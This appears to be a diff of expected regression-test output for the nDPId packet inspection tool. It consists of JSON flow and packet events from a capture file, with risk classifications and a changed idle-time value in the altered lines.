+00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="} +00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": 
{"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} +02158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLXL+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Ktlu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM
8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"} +02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vyCP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEfGu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRy
gtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4XaV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} 
00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
